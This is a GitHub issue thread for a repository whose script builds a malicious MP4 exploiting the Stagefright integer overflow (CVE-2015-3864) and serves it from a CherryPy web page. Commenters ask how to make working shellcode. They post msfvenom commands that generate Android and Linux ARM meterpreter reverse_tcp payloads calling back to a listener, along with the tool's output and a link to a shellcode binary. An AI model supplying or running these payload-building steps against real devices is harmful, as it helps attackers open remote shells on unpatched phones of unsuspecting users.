eudemonics / scaredycat

Python script to generate a malicious MP4 file and start a CherryPy web server hosting a simple HTML page with the embedded file. Exploits another Stagefright vulnerability, the integer overflow (CVE-2015-3864).

Shellcode #2

Open umerov1999 opened 8 years ago

umerov1999 commented 8 years ago

How do I make shellcode for this exploit? Your shellcode.bin is the apk file, is that correct? Have you tested this exploit? (How do I make shellcode for the exploit? Your shellcode.bin is an apk file. Is that correct, and have you tested this exploit?)

eudemonics commented 8 years ago

I generated it with msfvenom actually, but haven't been able to get it working successfully, so I suggest using your own shellcode. The included shellcode is supposed to be a reverse TCP shell for the Android ARM architecture.

umerov1999 commented 8 years ago

I generated shellcode.bin with msfvenom (msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.21 lport=1996 R > shellcode.bin) and created exploit.mp4, but this exploit doesn't work on my device (Samsung Galaxy Note 8, armv7-a, Android 4.4.4 official). My device is vulnerable to CVE-2015-3864 (tested with Zimperium Stagefright Detector).

sgang007 commented 8 years ago

@eudemonics Can you give any working shellcode, or tell how to generate one to test the code?

umerov1999 commented 8 years ago

https://github.com/eudemonics/scaredycat/files/85152/shellcode.bin.zip

umerov1999 commented 8 years ago

This shellcode is armle/linux/reverse_tcp.

dadreamer commented 7 years ago

@umerov1999 Thx for this hint, I was trying to build shellcode for Android, not for Linux. So, it should look something like this:

msf > msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
[*] exec: msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 200 bytes

Did you get the reverse shell successfully with the code you've posted above? I didn't with mine, and I'm unsure how to test it.